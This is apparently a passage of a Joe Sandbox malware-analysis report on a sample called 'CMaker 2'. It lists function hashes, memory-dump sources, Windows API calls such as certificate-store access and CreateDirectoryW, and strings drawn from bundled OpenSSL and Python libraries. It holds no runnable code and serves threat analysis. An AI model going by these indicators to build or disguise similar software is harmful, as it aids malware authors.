                                                                                                                                                                                  • Opcode ID: cc964c4150d7d1fd02e5e9c39ce5e1c415a6b070cf0dbb5d7f55af31f0ea2871
                                                                                                                                                                                  • Instruction ID: beb11b4b1b7a27f66c52ed043af6a477a8f72c20a326c3831d9f259a2054f206
                                                                                                                                                                                  • Opcode Fuzzy Hash: cc964c4150d7d1fd02e5e9c39ce5e1c415a6b070cf0dbb5d7f55af31f0ea2871
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C117538B1C28245FB5897B1565103962515F9A7B0FAC47BCE93EC77DAFE2DB4418300
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2265008608.00007FFD9DF90000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB4000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB9000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266200300.00007FFD9DFBA000.00000080.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266247225.00007FFD9DFBC000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007
                                                                                                                                                                                  • String ID: Invalid filter ID: %llu$dict_size$dist$start_offset
                                                                                                                                                                                  • API String ID: 3568877910-3368833446
                                                                                                                                                                                  • Opcode ID: 3d5f765dc4ef74a87ebfd11056e1228d9b848d22299d8acfc886f1edab02fccc
                                                                                                                                                                                  • Instruction ID: 8cbd412d3f665837ad971a608a6c54c8960fac5e6fae1223f7d4f5eeb4166507
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d5f765dc4ef74a87ebfd11056e1228d9b848d22299d8acfc886f1edab02fccc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 62411D71F08A87D1EA748F96E96207823A0AF95794B448331DA9D477E0FF7CE9A58700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                  • Opcode ID: 45ee2f7fa3d995a22adc73900efbbf06770fa7974e288ce688b1fb42a76d11f5
                                                                                                                                                                                  • Instruction ID: c3be862846ba974b8ca6b4ca6790a5b9614dc42c4bc37e6315a7f21a601d0e97
                                                                                                                                                                                  • Opcode Fuzzy Hash: 45ee2f7fa3d995a22adc73900efbbf06770fa7974e288ce688b1fb42a76d11f5
                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F062A9B09A0681EB148B64E8443795330BF497A5F949679DA7EC51E4FF2CD049C700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CertStore$CloseOpen$Collection
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1995843185-0
• Opcode ID: a6953a39759504ddb479cbb9bcf681c3032d5a5eefed2acd9d650b86d475ad4a
• Instruction ID: efaa465d358882650ca771c3098c44f9e7ed01b9a861fa9c627e8a57399939ad
• Opcode Fuzzy Hash: a6953a39759504ddb479cbb9bcf681c3032d5a5eefed2acd9d650b86d475ad4a
• Instruction Fuzzy Hash: D7213031B1865186F774EBA6A934739A7A1FB84BC1F488038CE4D5BB54DF3CE5468600
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
• Instruction ID: 30b1e2384388b32ce41d69414f1fe34d42d63a29e6c98b06329a7f5b3834ff8b
• Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
• Instruction Fuzzy Hash: CE11A7FEE1DA0305FF6411A4E45237914606F953B4F04EAF4E5BFC62E6FE6C69408184
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF2F
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF4E
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF76
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF87
• FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF98
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: d246c606bfef7ccb900317a1d308824ad35ed6390cb625aade358294dfc708cf
• Instruction ID: eebfa1da67c628ff2dbbc79db16d1fd281521e5a075649c616267af76763e2ce
• Opcode Fuzzy Hash: d246c606bfef7ccb900317a1d308824ad35ed6390cb625aade358294dfc708cf
• Instruction Fuzzy Hash: 18117C68F2D28301FB5C93A5A69117962515F963F0F9C43BDE93ECA7D6FE2CB4018200
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: d08938828d760f30092a1b3a417574d699fcdce62774d40d0c6dd9a0552b97ef
• Instruction ID: 870e34ba1ae097aedb5f21b96f9b65bd5dbd95824321eb94a07099094e26d61a
• Opcode Fuzzy Hash: d08938828d760f30092a1b3a417574d699fcdce62774d40d0c6dd9a0552b97ef
• Instruction Fuzzy Hash: 7211232CF2D24345FB6CA2B5585117912924F96330FAC5BBCE93EDA2D6FD2DB4018201
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
• Opcode ID: db001d0b7e8f7bba3f17a0e80451e4d7df515b3a5593d2b47e06f42f007c2e84
• Instruction ID: 9b1b1889ba5670809d1cce37adb5c031fa8faa068cd81f3b7046d8fd4b35669b
• Opcode Fuzzy Hash: db001d0b7e8f7bba3f17a0e80451e4d7df515b3a5593d2b47e06f42f007c2e84
• Instruction Fuzzy Hash: ED91C03AA0C68681F7258EA5D45037D3799AB42B94FDC42BADA6E873D5FF3CE4458300
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007B22408
• String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
• API String ID: 4199793457-2527649602
• Opcode ID: f54646abca4c87bb87db76196bf7c4bfa1316bed019ce2a666698ad422716a2b
• Instruction ID: 598ee766301ff735114053779605aa615c30203ba6e9ac34f07e92e585e1e1da
• Opcode Fuzzy Hash: f54646abca4c87bb87db76196bf7c4bfa1316bed019ce2a666698ad422716a2b
• Instruction Fuzzy Hash: D2B16125B0868292F7A5EBE5D4B47FC2769FB84B88F444035DA1DAB696DF3CE540C310
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
• Opcode ID: 150c0761ae2a60fcacf4f563602d34e283ae5762a11513620c4a6975bd049ac1
• Instruction ID: f3ca24ff7aad6f98c5c35a9f999bbbd2f660472456597411fd476942cb77a688
• Opcode Fuzzy Hash: 150c0761ae2a60fcacf4f563602d34e283ae5762a11513620c4a6975bd049ac1
• Instruction Fuzzy Hash: BB81A27AE0821285F7748EB981502782AA0EB12B45FDD80B9CE39D76D5FF2DE801D321
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
• Associated: 00000005.00000002.2266316234.00007FFD9DFC0000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266399755.00007FFD9DFDA000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266399755.00007FFD9DFE2000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266691733.00007FFD9DFE3000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266751869.00007FFD9DFE5000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
Similarity
• API ID: 00007A4331310
• String ID: H$join() result is too long for a Python string$sequence item %zd: expected str instance, %.80s found
• API String ID: 1168637666-3662399304
• Opcode ID: 63f11e17ca910a41eeeed5e16743e3acbc3563c55f803841b7e1b92467912e66
• Instruction ID: aa339fa85b342996319afa0e10e9e90b02e3f26688f24e73e5af81958088b72c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 63f11e17ca910a41eeeed5e16743e3acbc3563c55f803841b7e1b92467912e66
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F61B462B086D646EA349FA994263A967D0FB45BE4F154331CDAD873E4EF3CE859C300
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007A4331170
• String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
• API String ID: 276401418-4157686371
• Opcode ID: 0cedab6f8ac1c18ad5184dddee5a93dc31ceb4d9cafa2f85838576479d26596f
• Instruction ID: 5f35116e2835be2e6dae6d464bdd03d7d1099027f32399a4c5cbae711b1179fc
• Opcode Fuzzy Hash: 0cedab6f8ac1c18ad5184dddee5a93dc31ceb4d9cafa2f85838576479d26596f
• Instruction Fuzzy Hash: 99710566F0D69285FBB19BE1D4207BD67A9EF88784F444032EA4D67ADADF2CE540C700
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2263462576.00007FFD93481000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93480000, based on PE: true
• Associated: 00000005.00000002.2263419318.00007FFD93480000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000005.00000002.2263462576.00007FFD934E2000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000005.00000002.2263462576.00007FFD9352E000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000005.00000002.2263462576.00007FFD93531000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000005.00000002.2263462576.00007FFD93536000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000005.00000002.2263462576.00007FFD93590000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000005.00000002.2263462576.00007FFD93593000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000005.00000002.2263462576.00007FFD93595000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000005.00000002.2263462576.00007FFD93598000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000005.00000002.2264210337.00007FFD93599000.00000080.00000001.01000000.00000017.sdmp
• Associated: 00000005.00000002.2264282200.00007FFD9359B000.00000004.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd93480000_CMaker 2.jbxd
Similarity
• API ID: 00007B2246570
• String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
• API String ID: 511975427-87138338
• Opcode ID: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
• Instruction ID: 96e1f9abdef2a5115076c3c4a2bf543cd5883d1d0eab10922690b7b1477d3122
• Opcode Fuzzy Hash: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
• Instruction Fuzzy Hash: 5E613832B1864247E6709A59A82067A72AAFF80B94F564235EF5DE36C5DF3CD401CB00
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: 2b651edb78efaeb316ac5de78849fde0daa8bdd7bfc86cfa6ef8cb3431ad488b
• Instruction ID: d388fac00e09ed8da45102f73db7d852f0bbb9fa859a76dfd6f254d19cc44fda
• Opcode Fuzzy Hash: 2b651edb78efaeb316ac5de78849fde0daa8bdd7bfc86cfa6ef8cb3431ad488b
• Instruction Fuzzy Hash: 9E51C332B196028ADB14CF25E484A3937A2EB45B98F91C1B5DA6D877C8FF7DE841C700
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: fa0bcca0a4098b59133448382c677b9a55906fb86c6f234dcd4a21c8a5653ac7
• Instruction ID: 3cd6973b112f1b995034edcc07be01f3b6fa0540a872720f0753746501a5be93
• Opcode Fuzzy Hash: fa0bcca0a4098b59133448382c677b9a55906fb86c6f234dcd4a21c8a5653ac7
• Instruction Fuzzy Hash: 6F619632908BC586E7619F15E4803AAB7A0FB96B84F844265EBAC43795DF7CD194CB00
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: b11368fb803353e75de70a3c6cdb7d5ad95833e40dd5f9cce2c99e2783eb0f67
• Instruction ID: dc40e648c6c8cadd497d0596c525613277b9d698abaa67221561e8bfe024f982
• Opcode Fuzzy Hash: b11368fb803353e75de70a3c6cdb7d5ad95833e40dd5f9cce2c99e2783eb0f67
• Instruction Fuzzy Hash: 4751A332A0838286EB748F2194843787BA0EB56B95F9441F5DAAC877C5DFBCE451C701
                                                                                                                                                                                  APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
• Associated: 00000005.00000002.2265008608.00007FFD9DF90000.00000002.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2265214046.00007FFD9DFB4000.00000040.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2265214046.00007FFD9DFB9000.00000040.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2266200300.00007FFD9DFBA000.00000080.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2266247225.00007FFD9DFBC000.00000004.00000001.01000000.00000019.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
Similarity
• API ID: 00007A43319
• String ID: argument 'data'$contiguous buffer$decompress
• API String ID: 543699976-2667845042
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007F294
• String ID: ..\s\ssl\tls_srp.c
• API String ID: 1145900664-1778748169
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF6FABE240C,?,?,00007FF6FABE2BD3), ref: 00007FF6FABE6812
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\
• API String ID: 4241100979-1685191245
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
• Associated: 00000005.00000002.2265008608.00007FFD9DF90000.00000002.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2265214046.00007FFD9DFB4000.00000040.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2265214046.00007FFD9DFB9000.00000040.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2266200300.00007FFD9DFBA000.00000080.00000001.01000000.00000019.sdmp
